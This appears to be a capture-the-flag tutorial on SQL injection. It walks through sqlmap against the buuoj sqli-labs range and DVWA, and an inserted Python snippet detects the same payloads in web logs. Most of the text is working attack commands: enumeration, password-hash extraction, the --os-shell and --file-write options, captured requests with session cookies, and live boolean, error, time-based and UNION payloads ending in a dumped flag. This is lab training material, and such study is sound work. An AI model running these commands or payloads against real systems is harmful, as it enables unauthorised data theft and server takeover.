Practice range: https://buuoj.cn/challenges#sqli-labs

Basic SQL injection techniques

1. UNION injection
2. Boolean-based injection
3. Error-based injection
4. Time-based injection
5. Stacked-query injection
6. Second-order injection
7. Wide-byte (multibyte) injection
8. Case-variation bypass injection
9. Encoding bypass injection
10. Inline-comment bypass injection

Commands

Scan

sqlmap -u '<url+params>'

Add a cookie: --cookie

sqlmap -u '<url+params>' --cookie '<cookie>'

List databases: --dbs

sqlmap -u '<url+params>' --cookie '<cookie>' --dbs

List the table names in a database: --tables

sqlmap -u '<url+params>' --cookie '<cookie>' -D <db> --tables

List the column names in a table: --columns

sqlmap -u '<url+params>' --cookie '<cookie>' -D <db> -T <table> --columns

Dump column contents: --dump

sqlmap -u '<url+params>' --cookie '<cookie>' -D <db> -T <table> -C <column> --dump

Get the current database user: --current-user

Get the current user's password hashes: --passwords --threads 10 --hex

Other commands

--sql-shell   run custom SQL statements
--os-shell    run arbitrary operating-system commands
--file-read   read a file from the database server
--file-write & --file-dest   upload a file to the database server

GET request: build the request text from the browser dev tools (F12)

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 144.34.183.197
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://144.34.183.197/DVWA/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: security=low; PHPSESSID=is56nfk4e80i5l3ia2qohge711

Replay the GET request text with sqlmap

sqlmap -r get-sql.txt

POST request: build the request text from the browser dev tools (F12)

POST /DVWA/vulnerabilities/sqli/ HTTP/1.1
Host: 144.34.183.197
Connection: keep-alive
Content-Length: 18
Cache-Control: max-age=0
Origin: http://144.34.183.197
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://144.34.183.197/DVWA/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: security=medium; PHPSESSID=is56nfk4e80i5l3ia2qohge711

id=2&Submit=Submit

Replay the POST request text with sqlmap

sqlmap -r post-sql.txt

Get databases via the POST request

sqlmap -r post-sql.txt --dbs

Get tables via the POST request

sqlmap -r post-sql.txt -D dvwa --tables

Get columns via the POST request

sqlmap -r post-sql.txt -D dvwa -T users --columns

Get column contents via the POST request

sqlmap -r post-sql.txt -D dvwa -T users -C user,first_name,last_name,password,user_id --dump

Approach

1. Find the injection point
2. Enumerate databases
3. Enumerate tables
4. Enumerate columns
5. Dump column contents

Walkthrough

Test whether there is an injection point

Command

sqlmap -u 'http://0304b195-766f-4341-a524-f071ce989dbb.node3.buuoj.cn/Less-1/?id=1'
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3419=3419 AND 'zuYD'='zuYD

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 2163 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2163=2163,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'RrFe'='RrFe

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1890 FROM (SELECT(SLEEP(5)))fMhm) AND 'DOml'='DOml

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8155' UNION ALL SELECT NULL,CONCAT(0x717a717671,0x6e487266744f415a49716e4846736d63687a6d4964676f4a44766a4b75554b78444a7a69766e5a67,0x716b787071),NULL-- -
---
[12:26:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:26:30] [INFO] fetched data logged to text files under '/home/jxl/.local/share/sqlmap/output/bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn'

[*] ending @ 12:26:30 /2020-10-16/
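From the defender's side, the four techniques sqlmap reported above each leave a recognisable shape in the query string. The following is an added example, not part of the original notes or of sqlmap: a small Python detector that decodes the query string of constructed access-log lines (IP, host and log format are placeholders chosen here) and tags each request with the technique whose signature it matches.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines: one benign request plus the four
# payload shapes sqlmap reported above. The IP is a documentation-range placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Oct/2020:12:26:29 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 812',
    '203.0.113.5 - - [16/Oct/2020:12:26:29 +0000] "GET /Less-1/?id=1%27%20AND%203419%3D3419%20AND%20%27zuYD%27%3D%27zuYD HTTP/1.1" 200 812',
    '203.0.113.5 - - [16/Oct/2020:12:26:29 +0000] "GET /Less-1/?id=1%27%20AND%20(SELECT%202163%20FROM(SELECT%20COUNT(*),CONCAT(0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27RrFe%27%3D%27RrFe HTTP/1.1" 500 533',
    '203.0.113.5 - - [16/Oct/2020:12:26:30 +0000] "GET /Less-1/?id=1%27%20AND%20(SELECT%201890%20FROM%20(SELECT(SLEEP(5)))fMhm)%20AND%20%27DOml%27%3D%27DOml HTTP/1.1" 200 812',
    '203.0.113.5 - - [16/Oct/2020:12:26:30 +0000] "GET /Less-1/?id=-8155%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x71,0x6e48,0x71),NULL--%20- HTTP/1.1" 200 790',
]

# One signature per technique named in the sqlmap output; written here, not a vendor ruleset.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),      # AND 3419=3419
    "error-based (FLOOR)": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),           # SLEEP(5)
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

# Minimal parser for the combined log format: client IP, timestamp, method, path.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+"')


def classify(query):
    """Return the techniques whose signature appears in the URL-decoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return one finding per request whose path matches at least one signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        techniques = classify(m["path"])
        if techniques:
            findings.append({"ip": m["ip"], "time": m["ts"], "path": m["path"], "techniques": techniques})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], ", ".join(f["techniques"]))
```

Several distinct techniques from one client within a couple of seconds, as in the sample, is the footprint of an automated scanner rather than a single hand-crafted request.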

Get databases

sqlmap -u 'http://bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn/Less-1/?id=1' --dbs

available databases [6]:
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

Get tables

sqlmap -u 'http://bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn/Less-1/?id=1' -D ctftraining --tables

Database: ctftraining

[3 tables]
flag
news
users

Get columns

sqlmap -u 'http://bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn/Less-1/?id=1' -D ctftraining -T flag --columns

Database: ctftraining
Table: flag

[1 column]
Column   Type
flag     char(128)

Get column contents

sqlmap -u 'http://bcb56733-b4b0-479d-81be-35c186eb0a69.node3.buuoj.cn/Less-1/?id=1' -D ctftraining -T flag -C flag --dump
Database: ctftraining
Table: flag

[1 entry]
flag
flag{08e532cb-255c-48c0-bf7d-c1b2b2d6c859}